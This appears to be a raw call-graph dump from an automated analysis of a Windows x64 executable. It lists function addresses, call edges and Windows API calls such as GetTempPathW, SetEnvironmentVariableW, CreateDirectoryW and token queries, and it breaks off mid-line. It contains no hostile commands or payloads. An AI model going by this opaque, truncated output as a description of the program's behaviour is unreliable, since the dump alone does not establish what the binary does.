53 API calls 15889->15894 15895 7ff7ace815d5 15889->15895 15889->15898 16004 7ff7ace8fc6c 15889->16004 15890 7ff7ace81624 15893 7ff7ace8f1dc 74 API calls 15890->15893 15891->15898 15892 7ff7ace8f1dc 74 API calls 15892->15890 15893->15877 15894->15889 15897 7ff7ace824d0 59 API calls 15895->15897 15897->15898 15898->15890 15898->15892 15900 7ff7ace829a6 15899->15900 15901 7ff7ace81b30 49 API calls 15900->15901 15903 7ff7ace829db 15901->15903 15902 7ff7ace82dc9 15903->15902 15904 7ff7ace83b00 49 API calls 15903->15904 15905 7ff7ace82a57 15904->15905 16583 7ff7ace82ff0 15905->16583 15908 7ff7ace82ae7 15909 7ff7ace86700 98 API calls 15908->15909 15911 7ff7ace82aef 15909->15911 15910 7ff7ace82ff0 75 API calls 15912 7ff7ace82ae3 15910->15912 15914 7ff7ace82b0c 15911->15914 16591 7ff7ace865e0 15911->16591 15912->15908 15913 7ff7ace82b55 15912->15913 15916 7ff7ace82ff0 75 API calls 15913->15916 15917 7ff7ace82770 59 API calls 15914->15917 15952 7ff7ace82b26 15914->15952 15918 7ff7ace82b7e 15916->15918 15917->15952 15919 7ff7ace82bd8 15918->15919 15920 7ff7ace82ff0 75 API calls 15918->15920 15919->15914 15921 7ff7ace86700 98 API calls 15919->15921 15922 7ff7ace82bab 15920->15922 15927 7ff7ace82be8 15921->15927 15922->15919 15925 7ff7ace82ff0 75 API calls 15922->15925 15923 7ff7ace8acd0 _wfindfirst32i64 8 API calls 15924 7ff7ace82b4a 15923->15924 15924->15092 15925->15919 15926 7ff7ace81af0 59 API calls 15928 7ff7ace82c3f 15926->15928 15927->15914 15927->15926 15930 7ff7ace82d06 15927->15930 15928->15914 15929 7ff7ace81b30 49 API calls 15928->15929 15931 7ff7ace82c67 15929->15931 15930->15914 15943 7ff7ace82d1e 15930->15943 15932 7ff7ace82da2 15931->15932 15933 7ff7ace81b30 49 API calls 15931->15933 15934 7ff7ace82770 59 API calls 15932->15934 15935 7ff7ace82c94 15933->15935 15936 7ff7ace82d01 15934->15936 15935->15932 15938 7ff7ace81b30 49 API calls 15935->15938 15937 7ff7ace81ab0 74 API calls 15936->15937 15937->15914 15939 7ff7ace82cc1 15938->15939 15939->15932 15942 7ff7ace82ccc 15939->15942 15940 7ff7ace81440 161 API calls 15940->15943 15941 7ff7ace81780 59 API calls 15941->15943 15943->15940 15943->15941 15945 7ff7ace82d84 15943->15945 15943->15952 15946 7ff7ace82770 59 API calls 15945->15946 15948 7ff7ace82d95 15946->15948 15951 7ff7ace81ab0 74 API calls 15948->15951 15951->15952 15952->15923 15954 7ff7ace817a1 15953->15954 15955 7ff7ace81795 15953->15955 15954->15092 15956 7ff7ace82770 59 API calls 15955->15956 15956->15954 15958 7ff7ace86712 15957->15958 15963 7ff7ace86748 15957->15963 16008 7ff7ace816d0 15958->16008 15963->15867 15964 7ff7ace82770 59 API calls 15965 7ff7ace8673d 15964->15965 15965->15867 15967 7ff7ace86a30 15966->15967 15968 7ff7ace81b30 49 API calls 15967->15968 15969 7ff7ace86a61 15968->15969 15970 7ff7ace81b30 49 API calls 15969->15970 15981 7ff7ace86be9 15969->15981 15973 7ff7ace86a88 15970->15973 15971 7ff7ace8acd0 _wfindfirst32i64 8 API calls 15972 7ff7ace8147f 15971->15972 15972->15871 15972->15872 15973->15981 16533 7ff7ace95018 15973->16533 15975 7ff7ace86b99 15976 7ff7ace879a0 57 API calls 15975->15976 15978 7ff7ace86bb1 15976->15978 15977 7ff7ace86bd8 15980 7ff7ace83c90 116 API calls 15977->15980 15978->15977 16542 7ff7ace82880 15978->16542 15980->15981 15981->15971 15982 7ff7ace95018 49 API calls 15984 7ff7ace86abd 15982->15984 15983 7ff7ace879a0 57 API calls 15983->15984 15984->15975 15984->15981 15984->15982 15984->15983 15985 7ff7ace87810 58 API calls 15984->15985 15985->15984 15987 7ff7ace810a6 15986->15987 15988 7ff7ace810ad 15987->15988 15989 7ff7ace810d3 15987->15989 15990 7ff7ace82770 59 API calls 15988->15990 15992 7ff7ace810ed 15989->15992 15993 7ff7ace81109 15989->15993 15991 7ff7ace810c0 15990->15991 15991->15898 15994 7ff7ace824d0 59 API calls 15992->15994 15995 7ff7ace8111b 15993->15995 16002 7ff7ace81137 memcpy_s 15993->16002 15998 7ff7ace81104 __std_exception_copy 15994->15998 15996 7ff7ace824d0 59 API calls 15995->15996 15996->15998 15997 7ff7ace8f52c _fread_nolock 53 API calls 15997->16002 15998->15898 15999 7ff7ace811fe 16000 7ff7ace82770 59 API calls 15999->16000 16000->15998 16001 7ff7ace8fc6c 76 API calls 16001->16002 16002->15997 16002->15998 16002->15999 16002->16001 16003 7ff7ace8f2a0 37 API calls 16002->16003 16003->16002 16005 7ff7ace8fc9c 16004->16005 16568 7ff7ace8f9bc 16005->16568 16007 7ff7ace8fcba 16007->15889 16010 7ff7ace816f5 16008->16010 16009 7ff7ace81738 16012 7ff7ace86760 16009->16012 16010->16009 16011 7ff7ace82770 59 API calls 16010->16011 16011->16009 16013 7ff7ace86778 16012->16013 16014 7ff7ace867eb 16013->16014 16015 7ff7ace86798 16013->16015 16016 7ff7ace867f0 GetTempPathW 16014->16016 16017 7ff7ace86970 61 API calls 16015->16017 16018 7ff7ace86805 16016->16018 16019 7ff7ace867a4 16017->16019 16052 7ff7ace82470 16018->16052 16076 7ff7ace86460 16019->16076 16024 7ff7ace8acd0 _wfindfirst32i64 8 API calls 16027 7ff7ace8672d 16024->16027 16026 7ff7ace867ca __std_exception_copy 16026->16016 16029 7ff7ace867d8 16026->16029 16027->15963 16027->15964 16030 7ff7ace82770 59 API calls 16029->16030 16033 7ff7ace867e4 16030->16033 16031 7ff7ace868c6 16034 7ff7ace87ab0 59 API calls 16031->16034 16032 7ff7ace8681e __std_exception_copy 16032->16031 16035 7ff7ace86851 16032->16035 16056 7ff7ace9729c 16032->16056 16059 7ff7ace87810 16032->16059 16046 7ff7ace8688a __std_exception_copy 16033->16046 16037 7ff7ace868d7 __std_exception_copy 16034->16037 16036 7ff7ace879a0 57 API calls 16035->16036 16035->16046 16038 7ff7ace86867 16036->16038 16039 7ff7ace879a0 57 API calls 16037->16039 16037->16046 16040 7ff7ace8686c 16038->16040 16041 7ff7ace868a9 SetEnvironmentVariableW 16038->16041 16042 7ff7ace868f5 16039->16042 16043 7ff7ace879a0 57 API calls 16040->16043 16041->16046 16044 7ff7ace8692d SetEnvironmentVariableW 16042->16044 16045 7ff7ace868fa 16042->16045 16047 7ff7ace8687c 16043->16047 16044->16046 16048 7ff7ace879a0 57 API calls 16045->16048 16046->16024 16049 7ff7ace965e4 38 API calls 16047->16049 16050 7ff7ace8690a 16048->16050 16049->16046 16051 7ff7ace965e4 38 API calls 16050->16051 16051->16046 16053 7ff7ace82495 16052->16053 16110 7ff7ace93d68 16053->16110 16282 7ff7ace96ec8 16056->16282 16060 7ff7ace8ad00 16059->16060 16061 7ff7ace87820 GetCurrentProcess OpenProcessToken 16060->16061 16062 7ff7ace8786b GetTokenInformation 16061->16062 16063 7ff7ace878e1 __std_exception_copy 16061->16063 16064 7ff7ace8788d GetLastError 16062->16064 16065 7ff7ace87898 16062->16065 16066 7ff7ace878fa 16063->16066 16067 7ff7ace878f4 CloseHandle 16063->16067 16064->16063 16064->16065 16065->16063 16069 7ff7ace878ae GetTokenInformation 16065->16069 16413 7ff7ace87510 16066->16413 16067->16066 16069->16063 16071 7ff7ace878d4 ConvertSidToStringSidW 16069->16071 16071->16063 16077 7ff7ace8646c 16076->16077 16078 7ff7ace879a0 57 API calls 16077->16078 16079 7ff7ace8648e 16078->16079 16080 7ff7ace864a9 ExpandEnvironmentStringsW 16079->16080 16081 7ff7ace86496 16079->16081 16083 7ff7ace864cf __std_exception_copy 16080->16083 16082 7ff7ace82770 59 API calls 16081->16082 16088 7ff7ace864a2 16082->16088 16084 7ff7ace864e6 16083->16084 16085 7ff7ace864d3 16083->16085 16090 7ff7ace864f4 16084->16090 16091 7ff7ace86500 16084->16091 16086 7ff7ace82770 59 API calls 16085->16086 16086->16088 16087 7ff7ace8acd0 _wfindfirst32i64 8 API calls 16089 7ff7ace865c8 16087->16089 16088->16087 16089->16046 16100 7ff7ace965e4 16089->16100 16417 7ff7ace95e74 16090->16417 16424 7ff7ace95278 16091->16424 16094 7ff7ace864fe 16095 7ff7ace8651a 16094->16095 16098 7ff7ace8652d memcpy_s 16094->16098 16096 7ff7ace82770 59 API calls 16095->16096 16096->16088 16097 7ff7ace865a2 CreateDirectoryW 16097->16088 16098->16097 16099 7ff7ace8657c CreateDirectoryW 16098->16099 16099->16098 16101 7ff7ace965f1 16100->16101 16102 7ff7ace96604 16100->16102 16104 7ff7ace94374 _get_daylight 11 API calls 16101->16104 16525 7ff7ace96268 16102->16525 16106 7ff7ace965f6 16104->16106 16107 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 16106->16107 16109 7ff7ace96602 16107->16109 16109->16026 16112 7ff7ace93dc2 16110->16112 16111 7ff7ace93de7 16113 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 16111->16113 16112->16111 16114 7ff7ace93e23 16112->16114 16116 7ff7ace93e11 16113->16116 16128 7ff7ace92120 16114->16128 16118 7ff7ace8acd0 _wfindfirst32i64 8 API calls 16116->16118 16120 7ff7ace824b4 16118->16120 16119 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16119->16116 16120->16032 16121 7ff7ace93f04 16121->16119 16122 7ff7ace93ed9 16125 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16122->16125 16123 7ff7ace93f2a 16123->16121 16124 7ff7ace93f34 16123->16124 16127 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16124->16127 16125->16116 16126 7ff7ace93ed0 16126->16121 16126->16122 16127->16116 16129 7ff7ace9215e 16128->16129 16130 7ff7ace9214e 16128->16130 16131 7ff7ace92167 16129->16131 16137 7ff7ace92195 16129->16137 16132 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 16130->16132 16133 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 16131->16133 16134 7ff7ace9218d 16132->16134 16133->16134 16134->16121 16134->16122 16134->16123 16134->16126 16137->16130 16137->16134 16139 7ff7ace92b34 16137->16139 16172 7ff7ace92580 16137->16172 16209 7ff7ace91d10 16137->16209 16140 7ff7ace92b76 16139->16140 16141 7ff7ace92be7 16139->16141 16142 7ff7ace92c11 16140->16142 16143 7ff7ace92b7c 16140->16143 16144 7ff7ace92c40 16141->16144 16145 7ff7ace92bec 16141->16145 16228 7ff7ace90ee4 16142->16228 16146 7ff7ace92bb0 16143->16146 16147 7ff7ace92b81 16143->16147 16150 7ff7ace92c57 16144->16150 16151 7ff7ace92c4a 16144->16151 16156 7ff7ace92c4f 16144->16156 16148 7ff7ace92c21 16145->16148 16149 7ff7ace92bee 16145->16149 16153 7ff7ace92b87 16146->16153 16146->16156 16147->16150 16147->16153 16235 7ff7ace90ad4 16148->16235 16154 7ff7ace92b90 16149->16154 16159 7ff7ace92bfd 16149->16159 16242 7ff7ace9383c 16150->16242 16151->16142 16151->16156 16153->16154 16160 7ff7ace92bc2 16153->16160 16167 7ff7ace92bab 16153->16167 16171 7ff7ace92c80 16154->16171 16212 7ff7ace932e8 16154->16212 16156->16171 16246 7ff7ace912f4 16156->16246 16159->16142 16162 7ff7ace92c02 16159->16162 16160->16171 16222 7ff7ace93624 16160->16222 16165 7ff7ace936e8 37 API calls 16162->16165 16162->16171 16164 7ff7ace8acd0 _wfindfirst32i64 8 API calls 16166 7ff7ace92f7a 16164->16166 16165->16167 16166->16137 16168 7ff7ace93950 45 API calls 16167->16168 16170 7ff7ace92e6c 16167->16170 16167->16171 16168->16170 16170->16171 16253 7ff7ace9dae0 16170->16253 16171->16164 16173 7ff7ace925a4 16172->16173 16174 7ff7ace9258e 16172->16174 16175 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 16173->16175 16176 7ff7ace925e4 16173->16176 16174->16176 16177 7ff7ace92b76 16174->16177 16178 7ff7ace92be7 16174->16178 16175->16176 16176->16137 16179 7ff7ace92c11 16177->16179 16180 7ff7ace92b7c 16177->16180 16181 7ff7ace92c40 16178->16181 16182 7ff7ace92bec 16178->16182 16189 7ff7ace90ee4 38 API calls 16179->16189 16183 7ff7ace92bb0 16180->16183 16184 7ff7ace92b81 16180->16184 16187 7ff7ace92c57 16181->16187 16188 7ff7ace92c4a 16181->16188 16193 7ff7ace92c4f 16181->16193 16185 7ff7ace92c21 16182->16185 16186 7ff7ace92bee 16182->16186 16190 7ff7ace92b87 16183->16190 16183->16193 16184->16187 16184->16190 16195 7ff7ace90ad4 38 API calls 16185->16195 16191 7ff7ace92b90 16186->16191 16198 7ff7ace92bfd 16186->16198 16194 7ff7ace9383c 45 API calls 16187->16194 16188->16179 16188->16193 16204 7ff7ace92bab 16189->16204 16190->16191 16196 7ff7ace92bc2 16190->16196 16190->16204 16192 7ff7ace932e8 47 API calls 16191->16192 16207 7ff7ace92c80 16191->16207 16192->16204 16197 7ff7ace912f4 38 API calls 16193->16197 16193->16207 16194->16204 16195->16204 16199 7ff7ace93624 46 API calls 16196->16199 16196->16207 16197->16204 16198->16179 16200 7ff7ace92c02 16198->16200 16199->16204 16202 7ff7ace936e8 37 API calls 16200->16202 16200->16207 16201 7ff7ace8acd0 _wfindfirst32i64 8 API calls 16203 7ff7ace92f7a 16201->16203 16202->16204 16203->16137 16205 7ff7ace93950 45 API calls 16204->16205 16204->16207 16208 7ff7ace92e6c 16204->16208 16205->16208 16206 7ff7ace9dae0 46 API calls 16206->16208 16207->16201 16208->16206 16208->16207 16265 7ff7ace90158 16209->16265 16213 7ff7ace9330e 16212->16213 16214 7ff7ace8fd10 12 API calls 16213->16214 16215 7ff7ace9335e 16214->16215 16216 7ff7ace9d648 46 API calls 16215->16216 16217 7ff7ace93431 16216->16217 16223 7ff7ace93659 16222->16223 16224 7ff7ace93677 16223->16224 16225 7ff7ace9369e 16223->16225 16226 7ff7ace93950 45 API calls 16223->16226 16227 7ff7ace9dae0 46 API calls 16224->16227 16225->16167 16226->16224 16227->16225 16229 7ff7ace90f17 16228->16229 16230 7ff7ace90f46 16229->16230 16232 7ff7ace91003 16229->16232 16231 7ff7ace8fdb8 12 API calls 16230->16231 16234 7ff7ace90f83 16230->16234 16231->16234 16233 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 16232->16233 16233->16234 16234->16167 16236 7ff7ace90b07 16235->16236 16237 7ff7ace90b36 16236->16237 16239 7ff7ace90bf3 16236->16239 16238 7ff7ace8fdb8 12 API calls 16237->16238 16241 7ff7ace90b73 16237->16241 16238->16241 16240 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 16239->16240 16240->16241 16241->16167 16243 7ff7ace9387f 16242->16243 16244 7ff7ace938d8 45 API calls 16243->16244 16245 7ff7ace93883 __crtLCMapStringW 16243->16245 16244->16245 16245->16167 16247 7ff7ace91327 16246->16247 16248 7ff7ace91356 16247->16248 16250 7ff7ace91413 16247->16250 16249 7ff7ace8fdb8 12 API calls 16248->16249 16252 7ff7ace91393 16248->16252 16249->16252 16251 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 16250->16251 16251->16252 16252->16167 16254 7ff7ace9db11 16253->16254 16262 7ff7ace9db1f 16253->16262 16255 7ff7ace9db3f 16254->16255 16256 7ff7ace93950 45 API calls 16254->16256 16254->16262 16257 7ff7ace9db50 16255->16257 16258 7ff7ace9db77 16255->16258 16256->16255 16259 7ff7ace9f468 8 API calls 16257->16259 16260 7ff7ace9dc02 16258->16260 16258->16262 16259->16262 16262->16170 16266 7ff7ace9019f 16265->16266 16267 7ff7ace9018d 16265->16267 16269 7ff7ace901ad 16266->16269 16273 7ff7ace901e9 16266->16273 16268 7ff7ace94374 _get_daylight 11 API calls 16267->16268 16270 7ff7ace90192 16268->16270 16271 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 16269->16271 16272 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 16270->16272 16279 7ff7ace9019d 16271->16279 16272->16279 16274 7ff7ace90565 16273->16274 16276 7ff7ace94374 _get_daylight 11 API calls 16273->16276 16275 7ff7ace94374 _get_daylight 11 API calls 16274->16275 16274->16279 16277 7ff7ace907f9 16275->16277 16278 7ff7ace9055a 16276->16278 16280 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 16277->16280 16281 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 16278->16281 16279->16137 16280->16279 16281->16274 16323 7ff7acea05c8 16282->16323 16382 7ff7acea0340 16323->16382 16403 7ff7ace9f6b8 EnterCriticalSection 16382->16403 16414 7ff7ace87535 16413->16414 16415 7ff7ace93d68 48 API calls 16414->16415 16416 7ff7ace87558 LocalFree ConvertStringSecurityDescriptorToSecurityDescriptorW 16415->16416 16418 7ff7ace95e92 16417->16418 16421 7ff7ace95ec5 16417->16421 16418->16421 16436 7ff7ace9f854 16418->16436 16421->16094 16422 7ff7ace99d00 _wfindfirst32i64 17 API calls 16423 7ff7ace95ef5 16422->16423 16425 7ff7ace95302 16424->16425 16426 7ff7ace95294 16424->16426 16470 7ff7ace9efc0 16425->16470 16426->16425 16428 7ff7ace95299 16426->16428 16429 7ff7ace952b1 16428->16429 16430 7ff7ace952ce 16428->16430 16445 7ff7ace95048 GetFullPathNameW 16429->16445 16453 7ff7ace950bc GetFullPathNameW 16430->16453 16435 7ff7ace952c6 __std_exception_copy 16435->16094 16437 7ff7ace9f86b 16436->16437 16438 7ff7ace9f861 16436->16438 16439 7ff7ace94374 _get_daylight 11 API calls 16437->16439 16438->16437 16443 7ff7ace9f887 16438->16443 16440 7ff7ace9f873 16439->16440 16442 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 16440->16442 16441 7ff7ace95ec1 16441->16421 16441->16422 16442->16441 16443->16441 16444 7ff7ace94374 _get_daylight 11 API calls 16443->16444 16444->16440 16446 7ff7ace95084 16445->16446 16447 7ff7ace9506e GetLastError 16445->16447 16449 7ff7ace95080 16446->16449 16451 7ff7ace94374 _get_daylight 11 API calls 16446->16451 16448 7ff7ace942e8 _fread_nolock 11 API calls 16447->16448 16450 7ff7ace9507b 16448->16450 16449->16435 16452 7ff7ace94374 _get_daylight 11 API calls 16450->16452 16451->16449 16452->16449 16454 7ff7ace950ef GetLastError 16453->16454 16457 7ff7ace95105 __std_exception_copy 16453->16457 16455 7ff7ace942e8 _fread_nolock 11 API calls 16454->16455 16456 7ff7ace950fc 16455->16456 16458 7ff7ace94374 _get_daylight 11 API calls 16456->16458 16459 7ff7ace95101 16457->16459 16460 7ff7ace9515f GetFullPathNameW 16457->16460 16458->16459 16461 7ff7ace95194 16459->16461 16460->16454 16460->16459 16465 7ff7ace95208 memcpy_s 16461->16465 16466 7ff7ace951bd memcpy_s 16461->16466 16462 7ff7ace951f1 16463 7ff7ace94374 _get_daylight 11 API calls 16462->16463 16465->16435 16466->16462 16466->16465 16468 7ff7ace9522a 16466->16468 16468->16465 16469 7ff7ace94374 _get_daylight 11 API calls 16468->16469 16473 7ff7ace9edd0 16470->16473 16474 7ff7ace9ee12 16473->16474 16475 7ff7ace9edfb 16473->16475 16476 7ff7ace9ee16 16474->16476 16477 7ff7ace9ee37 16474->16477 16478 7ff7ace94374 _get_daylight 11 API calls 16475->16478 16499 7ff7ace9ef3c 16476->16499 16511 7ff7ace9e438 16477->16511 16481 7ff7ace9ee00 16478->16481 16485 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 16481->16485 16498 7ff7ace9ee0b __std_exception_copy 16485->16498 16490 7ff7ace8acd0 _wfindfirst32i64 8 API calls 16493 7ff7ace9ef31 16490->16493 16493->16435 16498->16490 16500 7ff7ace9ef86 16499->16500 16501 7ff7ace9ef56 16499->16501 16502 7ff7ace9ef91 GetDriveTypeW 16500->16502 16505 7ff7ace9ef71 16500->16505 16503 7ff7ace94354 _fread_nolock 11 API calls 16501->16503 16502->16505 16504 7ff7ace9ef5b 16503->16504 16506 7ff7ace94374 _get_daylight 11 API calls 16504->16506 16507 7ff7ace8acd0 _wfindfirst32i64 8 API calls 16505->16507 16509 7ff7ace9ee1b 16507->16509 16512 7ff7ace8c150 memcpy_s 16511->16512 16513 7ff7ace9e46e GetCurrentDirectoryW 16512->16513 16514 7ff7ace9e485 16513->16514 16515 7ff7ace9e4ac 16513->16515 16518 7ff7ace8acd0 _wfindfirst32i64 8 API calls 16514->16518 16516 7ff7ace9dc70 _get_daylight 11 API calls 16515->16516 16532 7ff7ace9f6b8 EnterCriticalSection 16525->16532 16534 7ff7ace9a550 __GetCurrentState 45 API calls 16533->16534 16535 7ff7ace9502d 16534->16535 16536 7ff7ace9edc7 16535->16536 16540 7ff7ace9ece6 16535->16540 16555 7ff7ace8b0d4 16536->16555 16539 7ff7ace8acd0 _wfindfirst32i64 8 API calls 16541 7ff7ace9edbf 16539->16541 16540->16539 16541->15984 16543 7ff7ace828a0 16542->16543 16544 7ff7ace93b14 49 API calls 16543->16544 16545 7ff7ace828ed memcpy_s 16544->16545 16546 7ff7ace879a0 57 API calls 16545->16546 16547 7ff7ace8291a 16546->16547 16548 7ff7ace82959 MessageBoxA 16547->16548 16549 7ff7ace8291f 16547->16549 16551 7ff7ace82973 16548->16551 16550 7ff7ace879a0 57 API calls 16549->16550 16552 7ff7ace82939 MessageBoxW 16550->16552 16553 7ff7ace8acd0 _wfindfirst32i64 8 API calls 16551->16553 16552->16551 16554 7ff7ace82983 16553->16554 16554->15977 16558 7ff7ace8b0e8 IsProcessorFeaturePresent 16555->16558 16559 7ff7ace8b0ff 16558->16559 16564 7ff7ace8b184 RtlCaptureContext RtlLookupFunctionEntry 16559->16564 16565 7ff7ace8b1b4 RtlVirtualUnwind 16564->16565 16566 7ff7ace8b113 16564->16566 16565->16566 16567 7ff7ace8afc4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16566->16567 16569 7ff7ace8f9dc 16568->16569 16574 7ff7ace8fa09 16568->16574 16570 7ff7ace8fa11 16569->16570 16571 7ff7ace8f9e6 16569->16571 16569->16574 16575 7ff7ace8f8fc 16570->16575 16573 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 16571->16573 16573->16574 16574->16007 16582 7ff7ace9421c EnterCriticalSection 16575->16582 16584 7ff7ace83024 16583->16584 16585 7ff7ace93b14 49 API calls 16584->16585 16586 7ff7ace8304a 16585->16586 16587 7ff7ace8305b 16586->16587 16615 7ff7ace94d38 16586->16615 16589 7ff7ace8acd0 _wfindfirst32i64 8 API calls 16587->16589 16590 7ff7ace82a96 16589->16590 16590->15908 16590->15910 16592 7ff7ace865ee 16591->16592 16593 7ff7ace83c90 116 API calls 16592->16593 16594 7ff7ace86615 16593->16594 16595 7ff7ace86a20 132 API calls 16594->16595 16596 7ff7ace86623 16595->16596 16598 7ff7ace8663d 16596->16598 16599 7ff7ace866d3 16596->16599 16597 7ff7ace866cf 16602 7ff7ace8acd0 _wfindfirst32i64 8 API calls 16597->16602 16798 7ff7ace8f274 16598->16798 16599->16597 16601 7ff7ace8f1dc 74 API calls 16599->16601 16601->16597 16604 7ff7ace866f5 16602->16604 16603 7ff7ace866b0 16605 7ff7ace8f1dc 74 API calls 16603->16605 16604->15914 16607 7ff7ace866c7 16605->16607 16606 7ff7ace8f52c _fread_nolock 53 API calls 16613 7ff7ace86642 16606->16613 16608 7ff7ace8f1dc 74 API calls 16607->16608 16608->16597 16609 7ff7ace8f2a0 37 API calls 16609->16613 16610 7ff7ace8fc6c 76 API calls 16610->16613 16611 7ff7ace86679 16804 7ff7ace972b8 16611->16804 16612 7ff7ace8f274 37 API calls 16612->16613 16613->16603 16613->16606 16613->16609 16613->16610 16613->16611 16613->16612 16616 7ff7ace94d61 16615->16616 16617 7ff7ace94d55 16615->16617 16657 7ff7ace9494c 16616->16657 16632 7ff7ace945b0 16617->16632 16624 7ff7ace94e09 16628 7ff7ace945b0 69 API calls 16624->16628 16625 7ff7ace94d99 16668 7ff7ace94434 16625->16668 16626 7ff7ace94d5a 16626->16587 16627 7ff7ace94df5 16627->16626 16629 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16627->16629 16630 7ff7ace94e15 16628->16630 16629->16626 16630->16626 16631 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16630->16631 16631->16626 16633 7ff7ace945e7 16632->16633 16634 7ff7ace945ca 16632->16634 16633->16634 16636 7ff7ace945fa CreateFileW 16633->16636 16635 7ff7ace94354 _fread_nolock 11 API calls 16634->16635 16637 7ff7ace945cf 16635->16637 16638 7ff7ace94664 16636->16638 16639 7ff7ace9462e 16636->16639 16641 7ff7ace94374 _get_daylight 11 API calls 16637->16641 16716 7ff7ace94c28 16638->16716 16690 7ff7ace94704 GetFileType 16639->16690 16644 7ff7ace945d7 16641->16644 16648 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 16644->16648 16646 7ff7ace94698 16737 7ff7ace949e8 16646->16737 16647 7ff7ace9466d 16651 7ff7ace942e8 _fread_nolock 11 API calls 16647->16651 16653 7ff7ace945e2 16648->16653 16649 7ff7ace94643 CloseHandle 16649->16653 16650 7ff7ace94659 CloseHandle 16650->16653 16656 7ff7ace94677 16651->16656 16653->16626 16656->16653 16658 7ff7ace94970 16657->16658 16659 7ff7ace9496b 16657->16659 16658->16659 16660 7ff7ace9a550 __GetCurrentState 45 API calls 16658->16660 16659->16625 16665 7ff7ace9defc 16659->16665 16661 7ff7ace9498b 16660->16661 16778 7ff7ace9ca5c 16661->16778 16786 7ff7ace9dce8 16665->16786 16669 7ff7ace94482 16668->16669 16670 7ff7ace9445e 16668->16670 16671 7ff7ace94487 16669->16671 16672 7ff7ace944dc 16669->16672 16674 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16670->16674 16678 7ff7ace9446d 16670->16678 16675 7ff7ace9449c 16671->16675 16671->16678 16679 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16671->16679 16795 7ff7ace9e720 16672->16795 16674->16678 16676 7ff7ace9c9fc _fread_nolock 12 API calls 16675->16676 16676->16678 16678->16624 16678->16627 16679->16675 16691 7ff7ace9480f 16690->16691 16692 7ff7ace94752 16690->16692 16693 7ff7ace94817 16691->16693 16694 7ff7ace94839 16691->16694 16695 7ff7ace9477e GetFileInformationByHandle 16692->16695 16700 7ff7ace94b24 21 API calls 16692->16700 16696 7ff7ace9482a GetLastError 16693->16696 16697 7ff7ace9481b 16693->16697 16699 7ff7ace9485c PeekNamedPipe 16694->16699 16715 7ff7ace947fa 16694->16715 16695->16696 16698 7ff7ace947a7 16695->16698 16703 7ff7ace942e8 _fread_nolock 11 API calls 16696->16703 16701 7ff7ace94374 _get_daylight 11 API calls 16697->16701 16702 7ff7ace949e8 51 API calls 16698->16702 16699->16715 16704 7ff7ace9476c 16700->16704 16701->16715 16705 7ff7ace947b2 16702->16705 16703->16715 16704->16695 16704->16715 16754 7ff7ace948ac 16705->16754 16706 7ff7ace8acd0 _wfindfirst32i64 8 API calls 16708 7ff7ace9463c 16706->16708 16708->16649 16708->16650 16710 7ff7ace948ac 10 API calls 16711 7ff7ace947d1 16710->16711 16712 7ff7ace948ac 10 API calls 16711->16712 16715->16706 16717 7ff7ace94c5e 16716->16717 16718 7ff7ace94374 _get_daylight 11 API calls 16717->16718 16736 7ff7ace94cf6 __std_exception_copy 16717->16736 16720 7ff7ace94c70 16718->16720 16719 7ff7ace8acd0 _wfindfirst32i64 8 API calls 16721 7ff7ace94669 16719->16721 16722 7ff7ace94374 _get_daylight 11 API calls 16720->16722 16721->16646 16721->16647 16723 7ff7ace94c78 16722->16723 16724 7ff7ace95278 45 API calls 16723->16724 16725 7ff7ace94c8d 16724->16725 16726 7ff7ace94c9f 16725->16726 16727 7ff7ace94c95 16725->16727 16729 7ff7ace94374 _get_daylight 11 API calls 16726->16729 16728 7ff7ace94374 _get_daylight 11 API calls 16727->16728 16733 7ff7ace94c9a 16728->16733 16730 7ff7ace94ca4 16729->16730 16731 7ff7ace94374 _get_daylight 11 API calls 16730->16731 16730->16736 16732 7ff7ace94cae 16731->16732 16734 7ff7ace95278 45 API calls 16732->16734 16735 7ff7ace94ce8 GetDriveTypeW 16733->16735 16733->16736 16734->16733 16735->16736 16736->16719 16738 7ff7ace94a10 16737->16738 16746 7ff7ace946a5 16738->16746 16761 7ff7ace9e5a4 16738->16761 16747 7ff7ace94b24 16746->16747 16748 7ff7ace94b3e 16747->16748 16749 7ff7ace94b75 16748->16749 16750 7ff7ace94b4e 16748->16750 16751 7ff7ace9e438 21 API calls 16749->16751 16752 7ff7ace94b5e 16750->16752 16753 7ff7ace942e8 _fread_nolock 11 API calls 16750->16753 16751->16752 16752->16656 16753->16752 16755 7ff7ace948d5 FileTimeToSystemTime 16754->16755 16756 7ff7ace948c8 16754->16756 16757 7ff7ace948e9 SystemTimeToTzSpecificLocalTime 16755->16757 16758 7ff7ace948d0 16755->16758 16756->16755 16756->16758 16757->16758 16759 7ff7ace8acd0 _wfindfirst32i64 8 API calls 16758->16759 16760 7ff7ace947c1 16759->16760 16760->16710 16762 7ff7ace9e5b1 16761->16762 16763 7ff7ace9e5d5 16761->16763 16762->16763 16764 7ff7ace9e5b6 16762->16764 16765 7ff7ace9e60f 16763->16765 16768 7ff7ace9e62e 16763->16768 16766 7ff7ace94374 _get_daylight 11 API calls 16764->16766 16767 7ff7ace94374 _get_daylight 11 API calls 16765->16767 16769 7ff7ace9e5bb 16766->16769 16771 7ff7ace9e614 16767->16771 16772 7ff7ace9494c 45 API calls 